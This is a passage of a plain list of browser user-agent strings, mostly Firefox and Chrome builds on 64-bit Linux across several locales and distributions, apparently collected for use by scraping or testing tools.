AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 
Safari/532.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.3 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.1 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.308.0 Safari/532.9 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.3 Safari/533.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.353.0 Safari/533.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.358.0 Safari/533.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.368.0 Safari/533.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.417.0 Safari/534.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.427.0 Safari/534.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.544.0 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.200 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like 
Gecko) Chrome/10.0.648.82 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.642.0 Chrome/10.0.642.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.127 Chrome/10.0.648.127 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 SUSE/10.0.626.0 (KHTML, like Gecko) Chrome/10.0.626.0 Safari/534.16 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.470.0 Safari/534.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/8.1.0.0 Safari/540.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US) Gecko Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008061317 (Gentoo) Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062315 (Gentoo) Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9) Gecko/2008062908 Firefox/3.0 (Debian-3.0~rc2-2) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008072820 Kubuntu/8.04 (hardy) Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.1) Gecko/2008110312 Gentoo Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009060309 Linux Mint/7 (Gloria) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc9 Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009061417 Gentoo Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009070612 Gentoo Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.16) Gecko/2009121609 Firefox/3.0.6 (Windows NT 5.1) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.17) Gecko/2010011010 Mandriva/1.9.0.17-0.1mdv2009.1 (2009.1) Firefox/3.0.17 GTB6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) 
Firefox/3.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.2) Gecko/2008092418 CentOS/3.0.2-3.el5.centos Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 (Linux Mint) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.4) Gecko/2008120512 Gentoo Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121711 Ubuntu/9.04 (jaunty) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121806 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008121911 CentOS/3.0.5-1.el5.centos Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122014 CentOS/3.0.5-1.el4.centos Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122120 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5) Gecko/2008122406 Gentoo Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009012700 SUSE/3.0.6-1.4 Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020407 Firefox/3.0.4 (Debian-3.0.6-1) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020519 Ubuntu/9.04 (jaunty) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030516 Ubuntu/9.04 (jaunty) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030516 Ubuntu/9.04 (jaunty) Firefox/3.0.7 GTB5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030719 Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009030810 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031120 Mandriva Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031120 Mandriva/1.9.0.7-0.1mdv2009.0 (2009.0) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009031802 Gentoo Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009032319 Gentoo Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.7) Gecko/2009032606 Red Hat/3.0.7-1.el5 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.1 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.1.1 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.04 (hardy) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032713 Ubuntu/9.04 (jaunty) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009032908 Gentoo Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009033100 Ubuntu/9.04 (jaunty) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.8) Gecko/2009040312 Gentoo Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090630 Firefox/3.5 GTB6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 
Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Linux Mint/7 (Gloria) Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.15) Gecko/20101027 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Firefox/3.5.2 Slackware -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Slackware Firefox/3.5.2 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090914 Slackware/13.0_stable Firefox/3.5.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091114 Gentoo Firefox/3.5.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.6) Gecko/20100117 Gentoo Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100318 Gentoo Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8pre) Gecko/20091227 Ubuntu/9.10 (karmic) Firefox/3.5.5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090312 Firefox/3.1b3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090327 Fedora/3.1-0.11.beta3.fc11 Firefox/3.1b3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b3) Gecko/20090327 GNU/Linux/x86_64 Firefox/3.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100130 Gentoo Firefox/3.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100222 Ubuntu/10.04 (lucid) Firefox/3.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100305 Gentoo Firefox/3.5.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101102 Gentoo Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101219 Gentoo Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101223 Gentoo Firefox/3.6.13 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100403 Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100524 Firefox/3.5.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.4) Gecko/20100614 Ubuntu/10.04 (lucid) Firefox/3.6.4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100723 SUSE/3.6.8-0.1.1 Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; 
rv:1.9.2a1pre) Gecko/20090405 Firefox/3.6a1pre -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b3pre) Gecko/2008011321 Firefox/3.0b3pre -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b3pre) Gecko/2008020509 Firefox/3.0b3pre -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b4) Gecko/2008031318 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b4) Gecko/2008040813 Firefox/3.0b4 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008041816 Fedora/3.0-0.55.beta5.fc9 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9pre) Gecko/2008042312 Firefox/3.0b5 -Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+ -Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9) Gecko/2008061015 Ubuntu/8.04 (hardy) Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9) Gecko/2008061017 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.4) Gecko/2008110510 Red Hat/3.0.4-1.el5_2 Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux x86_64; es-CL; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.12) Gecko/2009072711 CentOS/3.0.12-1.el5.centos Firefox/3.0.12 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.7) Gecko/2009022800 SUSE/3.0.7-1.4 Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc11 Firefox/3.5.8 -Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.12) Gecko/20101027 Fedora/3.6.12-1.fc13 Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux x86_64; es-MX; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.04 (lucid) Firefox/3.6.12 -Mozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.9.0.14) Gecko/2009090217 Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; fr-FR) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9) Gecko/2008061017 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-1.1 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.04 (jaunty) Firefox/3.0.11 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.14) Gecko/2009090216 Ubuntu/8.04 (hardy) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.19) Gecko/2010051407 CentOS/3.0.19-1.el5.centos Firefox/3.0.19 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.7) Gecko/2009030423 Ubuntu/8.10 (intrepid) Firefox/3.0.7 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9 -Mozilla/5.0 (X11; U; Linux x86_64; 
fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.3pre -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.6) Gecko/20091215 Ubuntu/9.10 (karmic) Firefox/3.5.6 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 GTB7.0 -Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.2.3) Gecko/20100403 Fedora/3.6.3-4.fc13 Firefox/3.6.3 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9) Gecko/2008061017 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.14) Gecko/2009090216 Ubuntu/8.04 (hardy) Firefox/3.0.14 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.3) Gecko/2008092813 Gentoo Firefox/3.0.3 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.0.8) Gecko/2009033100 Ubuntu/9.04 (jaunty) Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-2.fc12 Firefox/3.5.9 -Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.9) Gecko/20100402 Ubuntu/9.10 (karmic) Firefox/3.5.9 (.NET CLR 3.5.30729) -Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4 -Mozilla/5.0 (X11; U; Linux x86_64; ko-KR; rv:1.9.0.1) Gecko/2008071717 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; nb-NO; rv:1.9.0.8) Gecko/2009032600 SUSE/3.0.8-1.2 Firefox/3.0.8 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9) Gecko/2008060309 Firefox/3.0 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Ubuntu (hardy) Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.1) Gecko/2008071222 Ubuntu/hardy Firefox/3.0.1 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 -Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.0.5) Gecko/2008121623 Ubuntu/8.10 (intrepid) Firefox/3.0.5 -Mozilla/5.0 (X11; U; Linux x86_64; 